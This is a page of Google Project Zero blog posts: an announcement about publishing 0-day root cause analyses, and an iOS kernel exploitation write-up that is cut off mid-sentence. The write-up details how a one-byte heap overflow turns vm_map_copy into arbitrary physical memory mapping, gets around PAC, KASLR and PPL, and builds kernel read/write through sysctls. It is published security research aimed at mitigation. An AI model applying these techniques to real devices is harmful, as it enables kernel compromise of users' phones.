🔒
There are new articles available, click to refresh the page.
✇Google Project Zero

Root Cause Analyses for 0-day In-the-Wild Exploits

By: Tim

Posted by Maddie Stone, Project Zero


When a 0-day is exploited in the wild AND it is detected, we need to use that as an opportunity to learn as much as possible about the vulnerability and the exploit if we hope to make 0-day hard. One of the main methods to do that is to perform a root cause analysis (RCA) on the 0-day. 

Our effort on this began in earnest in the last quarter of 2019. Today we are beginning to publish the root cause analyses for 0-days exploited in the wild that we have completed. While we’re publishing some in bulk now to play “catch-up”, in the future we plan to post each one in a timely manner after it’s detected and disclosed. We think publishing technical details in a timely manner is important for transparency and so that the whole of the security community can make informed decisions and actions. 

We’ve added a new column to the “0day In the Wild” tracking spreadsheet that will link to any RCAs that we publish. We will also continue to update the following page on our blog as we publish additional RCAs.


For each of these root cause analyses, we are using a template. We developed this template based on what we, at Project Zero, find important and actionable about 0-days exploited in-the-wild, but we’d love your feedback on what other information would help you! We welcome any researchers and vendors who want to use our template and publish this information about 0-days they detect and/or analyze! 

When completing a root cause analysis we focus on the following areas.
  • Bug class
  • Details of the vulnerability, such as how to trigger, what it allows, etc.
  • Exploit method and whether or not it’s a known method
  • Hypothesis of how the vulnerability was found (code audit, fuzzing, variant analysis, etc.)
  • Any historical, present, and future bug context such as previous related bugs
  • Areas for variant analysis and any found variants
  • Structural improvements
    • Can you also kill the entire bug class?
    • Is there a way to make it much harder to exploit?
  • Potential detection methods for similar 0-days
    • Brainstorming ways that this 0-day exploit could have been caught while it was still a 0-day. Please note that this is different from “indicators of compromise” because we’re focusing on detecting while it’s still a 0-day.

We selected these areas because the vulnerability details and exploit method provide in-depth explanation of facts of the exploit: what is the vulnerability, how does it work, and how was it exploited. Once we have the facts documented, we can then use those facts to inform our hypotheses and brainstorm how we can prevent the attackers from being able to do it again. While some of these ideas may be considered infeasible by vendors or not work well in practice, some will be (and already have been) reasonable and able to be launched. The overarching goal is to force brainstorming in the hope of taking actions informed by the detected 0-day: actions to better detect, actions to better lockdown, actions to prevent new vulnerabilities from being introduced, actions to make 0-day hard.

Out of the 20 0-days for 2019 (more on what we decided to include/exclude in our tracking here), we completed 8 root cause analyses that we’re publishing here today. These are 5 out of the 6 of the 0-days detected in August or later of 2019 (when I joined the team and started this initiative 🙂 ). In addition, we’re publishing the two iOS 0-days from February 2019 that Project Zero reported to Apple in partnership with Google's Threat Analysis Group, and a Firefox 0-day that Project Zero had reported to Firefox, that was also discovered independently in-the-wild.


These RCAs provide technical details on what the vulnerability is and how it is exploited. We then hypothesize and brainstorm based on these details from our perspective as offensive security researchers. 

Our hope is that these analyses are helpful for others in the security and tech communities to act on data gleaned from detected 0-day exploits and help determine ways to make it more costly, more time consuming andmore difficult for attackers to use 0-days in the wild. Please reach out with any feedback and/or suggestions and we hope that others will also begin publishing information from the RCA template in the future.
✇Google Project Zero

One Byte to rule them all

By: Tim
Posted by Brandon Azad, Project Zero

One Byte to rule them all, One Byte to type them,
One Byte to map them all, and in userspace bind them
-- Comment above vm_map_copy_t

For the last several years, nearly all iOS kernel exploits have followed the same high-level flow: memory corruption and fake Mach ports are used to gain access to the kernel task port, which provides an ideal kernel read/write primitive to userspace. Recent iOS kernel exploit mitigations like PAC and zone_require seem geared towards breaking the canonical techniques seen over and over again to achieve this exploit flow. But the fact that so many iOS kernel exploits look identical from a high level begs questions: Is targeting the kernel task port really the best exploit flow? Or has the convergence on this strategy obscured other, perhaps more interesting, techniques? And are existing iOS kernel mitigations equally effective against other, previously unseen exploit flows?

In this blog post, I'll describe a new iOS kernel exploitation technique that turns a one-byte controlled heap overflow directly into a read/write primitive for arbitrary physical addresses, all while completely sidestepping current mitigations such as KASLR, PAC, and zone_require. By reading a special hardware register, it's possible to locate the kernel in physical memory and build a kernel read/write primitive without a fake kernel task port. I'll conclude by discussing how effective various iOS mitigations were or could be at blocking this technique and by musing on the state-of-the-art of iOS kernel exploitation. You can find the proof-of-concept code here.

I - The Fellowship of the Wiring

A struct of power

While looking through the XNU sources, I often keep an eye out for interesting objects to manipulate or corrupt for future exploits. Soon after discovering CVE-2020-3837 (the oob_timestamp vulnerability), I stumbled across the definition of vm_map_copy_t:

struct vm_map_copy {
        int                     type;
#define VM_MAP_COPY_ENTRY_LIST          1
#define VM_MAP_COPY_OBJECT              2
#define VM_MAP_COPY_KERNEL_BUFFER       3
        vm_object_offset_t      offset;
        vm_map_size_t           size;
        union {
                struct vm_map_header    hdr;      /* ENTRY_LIST */
                vm_object_t             object;   /* OBJECT */
                uint8_t                 kdata[0]; /* KERNEL_BUFFER */
        } c_u;
};

This looked interesting to me for several reasons:

  1. The structure has a type field at the very start, so an out-of-bounds write could change it from one type to another, leading to type confusion. Because iOS is little-endian, the least significant byte comes first in memory, meaning that even a single-byte overflow would be sufficient to set the type to any of the three values.
  2. The type discriminates a union between arbitrary controlled data (kdata) and kernel pointers (hdr and object). Thus, corrupting the type could let us directly fake pointers to kernel objects without needing to perform any reallocations.
  3. I remembered reading about vm_map_copy_t being used as an interesting primitive in past exploits (before iOS 10), though I couldn't remember where or how it was used. vm_map_copy objects were also used by Ian Beer in Splitting atoms in XNU.

So, vm_map_copy looks like a possibly interesting target for corruption; however, it's only truly interesting if the code uses it in a truly interesting way.

Digging through osfmk/vm/vm_map.c, I found that vm_map_copyout_internal() does indeed use the copy object in a very interesting way. But first, let's talk a little more about what vm_map_copy is and how it works.

A vm_map_copy represents a copy-on-write slice of a process's virtual address space which has been packaged up, ready to be inserted into another virtual address space. There are three possible internal representations: as a list of vm_map_entry objects, as a vm_object, or as an inline array of bytes to be directly copied into the destination. We'll focus on types 1 and 3.

Fundamentally, the ENTRY_LIST type is the most powerful and general representation, while the KERNEL_BUFFER type is strictly an optimization. A vm_map_entry list consists of several allocations and several layers of indirection: each vm_map_entry describes a virtual address range [vme_start, vme_end) that is being mapped by a specific vm_object, which in turn contains a list of vm_pages describing the physical pages backing the vm_object.

A diagram showing the heap arrangement of a vm_map_copy object of type ENTRY_LIST. The vm_map_entrys are stored in a circular doubly-linked list. Each entry holds a pointer to a vm_object describing the memory region for that entry. Each vm_object contains a singly-linked list of vm_pages describing the physical pages backing the memory object.


Meanwhile, if the data being inserted is not shared memory and if the size is roughly two pages or less, then the vm_map_copy is simply over-allocated to hold the data contents inline in the same allocation, no indirection or further allocations required.

A diagram showing the layout of a vm_map_copy of type KERNEL_BUFFER. Rather than having a linked list of vm_map_entrys, there is an inline array of data to be copied directly into the receiving address space.


As a consequence of this optimization, the 8 bytes of the vm_map_copy object at offset 0x20 can be either a pointer to the head of a vm_map_entry list, or fully attacker-controlled data, all depending on the type field at the start. So corrupting the first byte of a vm_map_copy object causes the kernel to interpret arbitrary controlled data as a vm_map_entry pointer.

Comparing vm_map_copy objects of type KERNEL_BUFFER and ENTRY_LIST, the "next" pointer of the ENTRY_LIST-type copy falls into the inline data of the KERNEL_BUFFER-type copy.


With this understanding of vm_map_copy internals, let's turn back to vm_map_copyout_internal(). This function is responsible for taking a vm_map_copy and inserting it into the destination address space (represented by type vm_map_t). It is reachable when sharing memory between processes by sending an out-of-line memory descriptor in a Mach message: the out-of-line memory is stored in the kernel as a vm_map_copy, and vm_map_copyout_internal() is the function that inserts it into the receiver's process.

As it turns out, things get rather exciting if vm_map_copyout_internal() processes a corrupted vm_map_copy containing a pointer to a fake vm_map_entry hierarchy. In particular, consider what happens if the fake vm_map_entry claims to be wired, which causes the function to try to fault in the page immediately:

kern_return_t
vm_map_copyout_internal(
    vm_map_t                dst_map,
    vm_map_address_t        *dst_addr,      /* OUT */
    vm_map_copy_t           copy,
    vm_map_size_t           copy_size,
    boolean_t               consume_on_success,
    vm_prot_t               cur_protection,
    vm_prot_t               max_protection,
    vm_inherit_t            inheritance)
{
...
    if (copy->type == VM_MAP_COPY_OBJECT) {
...
    }
...
    if (copy->type == VM_MAP_COPY_KERNEL_BUFFER) {
...
    }
...
    vm_map_lock(dst_map);
...
    adjustment = start - vm_copy_start;
...
    /*
     *    Adjust the addresses in the copy chain, and
     *    reset the region attributes.
     */
    for (entry = vm_map_copy_first_entry(copy);
        entry != vm_map_copy_to_entry(copy);
        entry = entry->vme_next) {
...
        entry->vme_start += adjustment;
        entry->vme_end += adjustment;
...
        /*
         * If the entry is now wired,
         * map the pages into the destination map.
         */
        if (entry->wired_count != 0) {
...
            object = VME_OBJECT(entry);
            offset = VME_OFFSET(entry);
...
            while (va < entry->vme_end) {
...
                m = vm_page_lookup(object, offset);
...
                vm_fault_enter(m,      // Calls pmap_enter_options()
                    dst_map->pmap,     // to map m->vmp_phys_page.
                    va,
                    prot,
                    prot,
                    VM_PAGE_WIRED(m),
                    FALSE,            /* change_wiring */
                    VM_KERN_MEMORY_NONE,    /* tag - not wiring */
                    &fault_info,
                    NULL,             /* need_retry */
                    &type_of_fault);
...
                offset += PAGE_SIZE_64;
                va += PAGE_SIZE;
           }
       }
   }
...
        vm_map_copy_insert(dst_map, last, copy);
...
    vm_map_unlock(dst_map);
...
}

Let's walk through this step-by-step. First, other vm_map_copy types are handled:

    if (copy->type == VM_MAP_COPY_OBJECT) {
...
    }
...
    if (copy->type == VM_MAP_COPY_KERNEL_BUFFER) {
...
    }

The vm_map is locked:

    vm_map_lock(dst_map);

We enter a for loop over the linked list of (fake) vm_map_entry objects:

    for (entry = vm_map_copy_first_entry(copy);
        entry != vm_map_copy_to_entry(copy);
        entry = entry->vme_next) {

We handle the case where the vm_map_entry is wired and should thus be faulted in immediately:

        if (entry->wired_count != 0) {

When set, we loop over every virtual address in the wired entry. Since we control the contents of the fake vm_map_entry, we can control the object pointer (of type vm_object) and offset value that are read:

            object = VME_OBJECT(entry);
            offset = VME_OFFSET(entry);
...
            while (va < entry->vme_end) {

We look up the vm_page struct for each physical page of memory that needs to be wired in. Since we control the fake vm_object and the offset, we can cause vm_page_lookup() to return a pointer to a fake vm_page struct whose contents we control:

                m = vm_page_lookup(object, offset);

And finally, we call vm_fault_enter() to fault in the page:

                vm_fault_enter(m,      // Calls pmap_enter_options()
                    dst_map->pmap,     // to map m->vmp_phys_page.
                    va,
                    prot,
                    prot,
                    VM_PAGE_WIRED(m),
                    FALSE,            /* change_wiring */
                    VM_KERN_MEMORY_NONE,    /* tag - not wiring */
                    &fault_info,
                    NULL,             /* need_retry */
                    &type_of_fault);

The call to vm_fault_enter() is rather complicated, so I won't put the code here. Suffice to say, by setting fields in our fake objects appropriately, it is possible to navigate vm_fault_enter() with a fake vm_page object in order to reach a call to pmap_enter_options() with a completely arbitrary physical page number:

kern_return_t
pmap_enter_options(
        pmap_t pmap,
        vm_map_address_t v,
        ppnum_t pn,
        vm_prot_t prot,
        vm_prot_t fault_type,
        unsigned int flags,
        boolean_t wired,
        unsigned int options,
        __unused void   *arg)

pmap_enter_options() is responsible for modifying the page tables of the destination to insert the translation table entry that will establish a mapping from a virtual address to a physical address. Analogously to how vm_map manages the state for the virtual mappings of an address space, the pmap struct manages the state for the physical mappings (i.e. page tables) of an address space. And according to the sources in osfmk/arm/pmap.c, no further validation is performed on the supplied physical page number before the translation table entry is added.

Thus, our corrupted vm_map_copy object actually gives us an incredibly powerful primitive: mapping arbitrary physical memory directly into our process in userspace!

If we start with a KERNEL_BUFFER vm_map_copy and corrupt the first byte to change the type to ENTRY_LIST, then we can control the value of the "next" field to make it point to a fake vm_map_entry hierarchy, including a fake vm_page. The physical address specified in the vm_page's "vmp_phys_page" field will be mapped by the call to vm_map_copyout_internal().

An old friend

I decided to build the POC for the vm_map_copy physical memory mapping technique on top of the kernel read/write primitive provided by the oob_timestamp exploit for iOS 13.3. There were two primary reasons for this.

First, I did not have a good bug available to develop a complete exploit with it. Even though I had initially stumbled upon the idea while trying to exploit the oob_timestamp bug, it quickly became apparent that that bug wasn't a good fit for this technique.

Second, I wanted to evaluate the technique independently of the vulnerability or vulnerabilities used to achieve it. It seemed that there was a good chance that the technique could be made deterministic (that is, without a failure case); implementing it on top of an unreliable vulnerability would make it hard to evaluate separately.

This technique most naturally fits a controlled one-byte linear heap overflow in any of the allocator zones kalloc.80 through kalloc.32768 (i.e., general-purpose allocations of between 65 and 32768 bytes). For ease of reference in the rest of this post, I'll simply call it the one-byte exploit technique.

Leaving the Shire

We've already laid out the bones of the technique above: create a vm_map_copy of type KERNEL_BUFFER containing a pointer to a fake vm_map_entry list, corrupt the type to ENTRY_LIST, receive it with vm_map_copyout_internal(), and get arbitrary physical memory mapped into our address space. However, successful exploitation is a little bit more complicated:

  1. We still have not addressed where this fake vm_map_entry/vm_object/vm_page hierarchy will be constructed.
  2. We need to ensure that the kernel thread that calls vm_map_copyout_internal() does not crash, panic, or deadlock after mapping the physical page.

  1. Mapping one physical page is great, but probably not sufficient by itself to achieve arbitrary kernel read/write. This is because:

    1. The kernelcache's exact load address in physical memory is unknown, so we cannot map any specific page of it directly without locating it first.
    2. It is possible that some hardware device exposes an MMIO interface that is powerful enough by itself to build some sort of read/write primitive; however, I'm not aware of any such component.

Thus, we will need to map more than one physical address, and most likely we will need to use data read from one mapping to find the physical address to use for another. This means our mapping primitive can not be one-shot.

  1. The call to vm_map_copy_insert() after the for loop tries to zfree() the vm_map_copy to the vm_map_copy_zone. This will panic given a vm_map_copy originally of type KERNEL_BUFFER, since KERNEL_BUFFER objects are initially allocated using kalloc().

    Thus, the only way to safely break out of the for loop and resume normal operation is to first get kernel read/write and then patch up state in the kernel to prevent this panic.

These constraints will guide the course of this exploit technique.

A short cut to PAN

An important prerequisite for the one-byte technique is to create a fake vm_map_entry object hierarchy at a known address. Since we are already building this POC on oob_timestamp, I decided to leverage a neat trick I picked up while exploiting that bug. In the real world, another vulnerability in addition to the one-byte overflow might be needed to leak a kernel address.

While developing the POC for oob_timestamp, I learned that the AGXAccelerator kernel extension provides a very interesting primitive: IOAccelSharedUserClient2 and IOAccelCommandQueue2 together allow the creation of large regions of pageable memory shared between userspace and the kernel. Having access to user/kernel shared memory can be extremely helpful when developing exploits, since you can place fake kernel data structures there and manipulate them while the kernel accesses them. Of course, this AGXAccelerator primitive is not the only way to get kernel/user shared memory; the physmap, for example, also maps most of DRAM into virtual memory, so it can also be used to reflect userspace memory contents into the kernel. However, the AGXAccelerator primitive is often much more convenient in practice: for one, it provides a very large contiguous shared memory region in a much more constrained address range; and for two, it's easier to leak addresses of adjacent objects to locate it.

Now, before the iPhone 7, iOS devices did not support the Privileged Access Never (PAN) security feature. This meant that all of userspace was effectively shared memory with the kernel, and you could just overwrite pointers in the kernel to point to fake data structures in userspace.

However, modern iOS devices enable PAN, so attempts by the kernel to directly access userspace memory will fault. This is what makes the existence of the AGXAccelerator shared memory primitive so useful: if you can establish a large shared memory region and learn its address in the kernel, that's basically equivalent to having PAN turned off.

Of course, a key part of that sentence is "and learn its address in the kernel"; doing that usually requires a vulnerability and some effort. Instead, as we already rely on oob_timestamp, we will simply hardcode the shared memory address and note that finding the address dynamically is left as an exercise for the reader.

At the sign of the panicking POC

With kernel read/write and a user/kernel shared memory buffer in hand, we are ready to write the POC. The overall flow of the exploit is essentially what was outlined above.

We start by creating the shared memory region in the kernel.

We initialize a fake vm_map_entry list inside the shared memory. The entry list contains 3 entries: a "ready" entry, a "mapping" entry, and a "done" entry. Together these entries will represent the current state of each mapping operation.

There are 3 fake vm_map_entry objects in the shared memory buffer, representing the 3 states of our mapping operation. To start, the "ready" entry forwards to the "done" entry, which loops back to itself.


We send an out-of-line memory descriptor containing a fake vm_map_header in a Mach message to a holding port. The out-of-line memory is stored in the kernel as a vm_map_copy object of type KERNEL_BUFFER (value 3).

A vm_map_copy of type KERNEL_BUFFER includes inline kernel data; overlapping what would be the "next" field in an ENTRY_LIST copy is the value of a pointer to the "ready" entry in our shared memory buffer. But at this point, the copy's type is KERNEL_BUFFER, so the "pointer" is really just inline data.


We simulate a one-byte linear heap overflow that corrupts the type field of the vm_map_copy, changing it to ENTRY_LIST (value 1).

A one-byte overflow into the vm_map_copy changes its type from KERNEL_BUFFER to ENTRY_LIST. At this point, the inline data is now interpreted as a vm_map_header with a "next" field pointing to the "ready" entry.


We start a thread that receives the Mach message queued on the holding port. This triggers a call to vm_map_copyout_internal() on the corrupted vm_map_copy.

Due to the way the vm_map_entry list was initially configured, the vm_map_copyout thread will spin in an infinite loop on the "done" entry, ready for us to manipulate it.

Calling vm_map_copyout_internal() on the corrupted vm_map_copy will traverse the linked list, going from "ready" to "done" and spinning in an infinite loop on "done".


At this point, we have a kernel thread that is spinning ready to map any physical page we request.

To map a page, we first set the "ready" entry to link to itself, and then set the "done" entry to link to the "ready" entry. This will cause the vm_map_copyout thread to spin on "ready".

To get ready to map a physical page, we make the "ready" entry point to itself and then make the "done" entry point to the "ready" entry. The for loop in vm_map_copyout_internal() will follow the updated link from the "done" entry to the "ready" entry then spin on "ready". This state indicates that we're ready to set up the physical mapping.


While spinning on "ready", we mark the "mapping" entry as wired with a single physical page and link it to the "done" entry, which we link to itself. We also populate the fake vm_object and vm_page to map the desired physical page number.

Now that the mapping primitive is "ready", we will modify the "mapping" entry to map the desired physical page. We mark it as wired and specify a vm_object and vm_page containing the physical address to map. Also, we make the "done" entry link to itself to ensure the mapping happens only once.


Then, we can perform the mapping by linking the "ready" entry to the "mapping" entry. vm_map_copyout_internal() will map in the page and then spin on the "done" entry, signaling completion.

Finally, we map a page by simply linking the "ready" entry to the "mapping" entry, causing vm_map_copyout_internal() to follow the link and process the "mapping" entry. Since it is wired, it maps in the page right away. Finally, once the mapping is complete, vm_map_copyout_internal() will follow the link and start spinning on the "done" entry, indicating that the operation has completed.


This gives us a reusable primitive that maps arbitrary physical addresses into our process. As an initial proof of concept, I mapped the non-existent physical address 0x414140000 and tried to read from it, triggering an LLC bus error from EL0:

This is a screenshot of a device panic.

The mines of memory

At this point we have proved that the mapping primitive is sound, but we still don't know what to do with it.

My first thought was that the easiest approach would be to go after the kernelcache image in memory. Note that on modern iPhones, even with a direct physical read/write primitive, KTRR prevents us from modifying the locked down portions of the kernel image, so we can't just patch the kernel's executable code. However, certain segments of the kernelcache image remain writable at runtime, including the part of the __DATA segment that contains sysctls. Since sysctls have been (ab)used before to build read/write primitives, this felt like a stable path forward.

The challenge was then to use the mapping primitive to locate the kernelcache in physical memory, so that the sysctl structs could then be mapped into userspace and modified.

But first, before we figure out how to locate the kernelcache, some background on physical memory on the iPhone 11 Pro.

The iPhone 11 Pro has 4 GB of DRAM based at physical address 0x800000000, so physical DRAM addresses span 0x800000000 to 0x900000000. Of this, the range 0x801b80000 to 0x8ec9b4000 is reserved for the Application Processor (AP), the main processor of the phone which runs the XNU kernel and applications. Memory outside this region is reserved for coprocessors like the Always On Processor (AOP), Apple Neural Engine (ANE), SIO (possibly Apple SmartIO), AVE, ISP, IOP, etc. The addresses of these and other regions can be found by parsing the devicetree or by dumping the iboot-handoff region at the start of DRAM.

A map of DRAM. The first little slice at the beginning, and a bigger slice at the end, are reserved for coprocessors, while the vast bulk of DRAM in the middle is for the Application Processor.


At boot time, the kernelcache is loaded contiguously into physical memory, which means that finding a single kernelcache page is sufficient to locate the whole image. Also, while KASLR may slide the kernelcache by a large amount in virtual memory, the load address in physical memory is quite constrained: in my testing, the kernel header was always loaded at an address between 0x805000000 and 0x807000000, a range of just 32 MB.

As it turns out, this range is smaller than the kernelcache itself at 0x23d4000 bytes, or 35.8 MB. Thus, we can be certain at runtime that address 0x807000000 contains a kernelcache page.

However, I quickly ran into panics when trying to map the kernelcache:

panic(cpu 4 caller 0xfffffff0156f0c98): "pmap_enter_options_internal: page belongs to PPL, " "pmap=0xfffffff031a581d0, v=0x3bb844000, pn=2103160, prot=0x3, fault_type=0x3, flags=0x0, wired=1, options=0x1"

This panic string purports to come from the function pmap_enter_options_internal(), which is in the open-source part of XNU (osfmk/arm/pmap.c), and yet the panic is not present in the sources. Thus, I reversed the version of pmap_enter_options_internal() in the kernelcache to figure out what was happening.

The issue, I learned, is that the specific page I was trying to map was part of Apple's Page Protection Layer (PPL), a portion of the XNU kernel that manages page tables and that is considered even more privileged than the rest of the kernel. The goal of PPL is to prevent an attacker from modifying protected pages (in particular, executable code pages for codesigned binaries) even after compromising the kernel to obtain a read/write capability.

In order to enforce that protected pages cannot be modified, PPL must protect page tables and page table metadata. Thus, when I tried to map a PPL-protected page into userspace, it triggered a panic.

if (pa_test_bits(pa, 0x4000 /* PP_ATTR_PPL? */)) {
    panic("%s: page belongs to PPL, " ...);
}

if (pvh_get_flags(pai_to_pvh(pai)) & PVH_FLAG_LOCKDOWN) {
    panic("%s: page locked down, " ...);
}

The presence of PPL significantly complicates use of the physical mapping primitive, since trying to map a PPL-protected page will panic. And the kernelcache itself contains many PPL-protected pages, splitting the contiguous 35 MB binary into smaller PPL-free chunks that no longer bridge the physical slide of the kernelcache. Thus, there is no longer a single physical address we can (safely) map that is guaranteed to be a kernelcache page.

And the rest of the AP's DRAM region is an equally treacherous minefield. Physical pages are grabbed for use by PPL and returned to the kernel as-needed, and so at runtime PPL pages are scattered throughout physical memory like mines. Thus, there is no static address anywhere that is guaranteed not to blow up.

Looking at the AP's DRAM over time, unmappable pages are scattered semi-randomly throughout the physical address space, and pages can both enter and exit PPL.
A map showing the protection flags on every page of AP DRAM on the A13 over time. Yellow is PPL+LOCKDOWN, red is PPL, green is LOCKDOWN, and blue is unguarded (i.e., mappable).

II - The Two Techniques

The road to DRAM's guard

Yet, that's not quite true. The Application Processor's DRAM region might be a minefield, but anything outside of it is not. That includes the DRAM used by coprocessors and also any other addressable components of the system, such as hardware registers for system components that are typically accessed via memory-mapped I/O (MMIO).

With such a powerful primitive, I expect that there are a plethora of techniques that could be used to build a read/write primitive. And I expect that there are many clever things that could be done by leveraging direct access to special hardware registers and coprocessors. Unfortunately, this is not an area with which I'm very familiar, so I'll just describe one (failed) attempt to bypass PPL here.

The idea I had was to take control of some coprocessor and use execution on both the coprocessor and the AP together to attack the kernel. First, we use the physical mapping primitive to modify the part of DRAM storing data for a coprocessor in order to get code execution on that coprocessor. Next, back on the main processor, we use the mapping primitive a second time to map and disable the coprocessor's Device Address Resolution Table, or DART (basically an IOMMU). With code execution on the coprocessor and the corresponding DART disabled, we have direct unguarded access from the coprocessor to physical memory, allowing us to completely sidestep the protections of PPL (which are only enforced from the AP).

However, whenever I tried to modify certain regions of DRAM used by coprocessors, I would get kernel panics. In particular, the region 0x800000000 - 0x801564000 appeared to be readonly:

panic(cpu 5 caller 0xfffffff0189fc598): "LLC Bus error from cpu1: FAR=0x16f507f10 LLC_ERR_STS/ADR/INF=0x11000ffc00000080/0x214000800000000/0x1 addr=0x800000000 cmd=0x14(acc_cifl2c_cmd_ncwr)"

panic(cpu 5 caller 0xfffffff020ca4598): "LLC Bus error from cpu1: FAR=0x15f03c000 LLC_ERR_STS/ADR/INF=0x11000ffc00000080/0x214030800104000/0x1 addr=0x800104000 cmd=0x14(acc_cifl2c_cmd_ncwr)"

panic(cpu 5 caller 0xfffffff02997c598): "LLC Bus error from cpu1: FAR=0x10a024000 LLC_ERR_STS/ADR/INF=0x11000ffc00000082/0x21400080154c000/0x1 addr=0x80154c000 cmd=0x14(acc_cifl2c_cmd_ncwr)"

This was very weird: these addresses are outside of the KTRR lockdown region, so nothing should be able to block writing to this part of DRAM with a physical mapping primitive! Thus, there must be some other undocumented lockdown enforced on this physical range.

On the other hand, the region 0x801564000 - 0x801b80000 remains writable as expected, and writing to different areas in this region produces odd system behaviors, supporting the theory that this is corrupting data used by coprocessors. For example, writing to some areas would cause the camera and flashlight to become unresponsive, while writing to other areas would cause the phone to panic when the mute slider was switched on.

To get a better sense of what might be happening, I identified the regions in this range by examining the devicetree and dumping memory. In the end, I discovered the following layout of coprocessor firmware segments in the range 0x800000000 - 0x801b80000:

Mapping out the data in the (smaller) physical memory region before the AP carveout, it seems that there are in fact two segments: A larger read-only span containing __TEXT segments (i.e. code) for coprocessor firmwares, and a smaller writable span containing the corresponding __DATA segments of the same firmwares.

Thus, the regions that are locked down are all __TEXT segments of coprocessor firmwares; this strongly suggests that Apple has added a new mitigation to make coprocessor __TEXT segments read-only in physical memory, similar to KTRR on the AMCC (probably Apple's memory controller) but for coprocessor firmwares instead of just the AP kernel. This might be the undocumented CTRR mitigation referenced in the originally published xnu-6153.41.3 sources that appears to be an enhanced replacement for KTRR on A12 and up; Ian Beer suggested CTRR might stand for Coprocessor Text Readonly Region.

Nevertheless, code execution on these coprocessors should still be viable: just as KTRR does not prevent exploitation on the AP, the coprocessor __TEXT lockdown mitigation does not prevent exploitation on coprocessors. So, even though this mitigation makes things more difficult, at this point our plan of disabling a DART and using code execution on the coprocessor to write to a PPL-protected physical address should still work.

The voice of PPL

What did turn out to be a roadblock however was the DART/IOMMU lockdown enforced by PPL on the Application Processor. At boot, XNU parses the "pmap-io-ranges" property in the devicetree to populate the io_attr_table array, which stores page attributes for certain physical I/O addresses. Then, when trying to map the physical address, pmap_enter_options_internal() checks the attributes to see if certain mappings should be disallowed:

wimg_bits = pmap_cache_attributes(pn); // checks io_attr_table
if ( flags )
    wimg_bits = wimg_bits & 0xFFFFFF00 | (u8)flags;
pte |= wimg_to_pte(wimg_bits);
if ( wimg_bits & 0x4000 )
{
    xprr_perm = (pte >> 4) & 0xC | (pte >> 53) & 1 | (pte >> 53) & 2;
    if ( xprr_perm == 0xB )
        pte_perm_bits = 0x20000000000080LL;
    else if ( xprr_perm == 3 )
        pte_perm_bits = 0x20000000000000LL;
    else
        panic("Unsupported xPRR perm ...");
    pte = pte_perm_bits | pte & ~0x600000000000C0uLL;
}
pmap_enter_pte(pmap, pte_p, pte, vaddr);

Thus, we can only map the DART's I/O address into our process if bit 0x4000 is clear in the wimg field. Unfortunately, a quick look at the "pmap-io-ranges" property in the devicetree confirmed that bit 0x4000 was set for every DART:

    addr         len        wimg     signature
0x620000000, 0x40000000,       0x27, 'PCIe'
0x2412C0000,     0x4000,     0x4007, 'DART' ; dart-sep
0x235004000,     0x4000,     0x4007, 'DART' ; dart-sio
0x24AC00000,     0x4000,     0x4007, 'DART' ; dart-aop
0x23B300000,     0x4000,     0x4007, 'DART' ; dart-pmp
0x239024000,     0x4000,     0x4007, 'DART' ; dart-usb
0x239028000,     0x4000,     0x4007, 'DART' ; dart-usb
0x267030000,     0x4000,     0x4007, 'DART' ; dart-ave
...
0x8FC3B4000,     0x4000, 0x40004016, 'GUAT' ; sgx.gfx-handoff-base

Thus, we cannot map the DART into userspace to disable it.

The palantír

Even though PPL prevents us from mapping page tables and DART I/O addresses, the physical I/O addresses for other hardware components are still mappable. Thus, it is still possible to map and read some system component's hardware registers to try and locate the kernel.

My initial attempt was to read from IORVBAR, the Reset Vector Base Address Register accessible via MMIO. The reset vector is the first piece of code that executes on a CPU after it resets; thus, reading IORVBAR would give us the physical address of XNU's reset vector, which would pinpoint the kernelcache in physical memory.

IORVBAR is mapped at offset 0x40000 after the "reg-private" address for each CPU in the devicetree; for example, on A13 CPU 0 it is located at physical address 0x210050000. It is part of the same group of register sets containing CoreSight and DBGWRAP that had been previously used to bypass KTRR. However, I found that IORVBAR is not accessible on A13: trying to read from it will panic.

I spent some time searching the A13 SecureROM for interesting physical addresses before Jann Horn suggested that I map the KTRR lockdown registers on the AMCC, Apple's memory controller. These registers store the physical memory bounds of the KTRR region in order to enforce the KTRR readonly region against attacks from coprocessors.

The AMCC has MMIO registers that store the physical addresses of the bounds of the KTRR lockdown region.


Mapping and reading the AMCC's RORGNBASEADDR register at physical address 0x200000680 worked like a charm, yielding the start address of the lockdown region containing the kernelcache in physical memory. Using security mitigations to break other security mitigations is fun. :)

The back gate is closed

After finding a definitive way forward using AMCC, I looked at one last possibility before giving up on bypassing PPL.

iOS is configured with 40-bit physical addresses and 16K pages (14 bits). Meanwhile, the arbitrary physical page number passed to pmap_enter_options_internal() is 32 bits, and is shifted by 14 and masked with 0xFFFF_FFFF_C000 when inserted into the level 3 translation table entry (L3 TTE). This means that we could control bits 45 - 14 of the TTE, even though bits 45 - 40 should always be zero based on the physical address size programmed in TCR_EL1.IPS.

If the hardware ignored the bits beyond the maximum supported physical address size, then we could bypass PPL by supplying a physical page number that exactly matches the DART I/O address or page table page, but with one of the high bits set. Having the high bits set would cause the mapped address to fail to match any of the addresses in "pmap-io-ranges", even though the TTE would map the same physical address. This would be neat as it would allow us to bypass PPL as a precursor to kernel read/write/execute, rather than the other way around.

Unfortunately, it turns out that the hardware does in fact check that TTE bits beyond the supported physical address size are zero. Thus, I went forward with the AMCC trick to locate the kernelcache instead.

The taming of sysctl

At this point, we have a physical read/write primitive for non-PPL physical addresses, and we know the address of the kernelcache in physical memory. The next step is to build a virtual read/write primitive.

I decided to stick with known techniques for this part: using the fact that the sysctl_oid tree used by the sysctl() syscall is stored in writable memory in the kernelcache to manipulate it and convert benign sysctls allowed by the app sandbox into kernel read/write primitives.

XNU inherited sysctls from FreeBSD; they provide access to certain kernel variables to userspace. For example, the "hw.l1dcachesize" readonly sysctl allows a process to determine the L1 data cache line size, while the "kern.securelevel" read/write sysctl controls the "system security level" used for some operations in the BSD portion of the kernel.

The sysctls are organized into a tree hierarchy, with each node in the tree represented by a sysctl_oid struct. Building a kernel read primitive is as simple as mapping the sysctl_oid struct for some sysctl that is readable in the app sandbox and changing the target variable pointer (oid_arg1) to point to the virtual address we want to read. Invoking the sysctl then  reads that address.

An example sysctl_oid struct in the kernelcache.


Using sysctls to build a write primitive is a bit more complicated, since no sysctls are listed as writable in the container sandbox profile. The ziVA exploit for iOS 10.3.1 worked around this by changing the oid_handler field of the sysctl to call copyin(). However, on PAC-enabled devices like the A13, oid_handler is protected with a PAC, meaning that we cannot change its value.

However, when disassembling the function hook_system_check_sysctlbyname() that implements the sandbox check for the sysctl() system call, I noticed an interesting undocumented behavior:

// Sandbox check sysctl-read
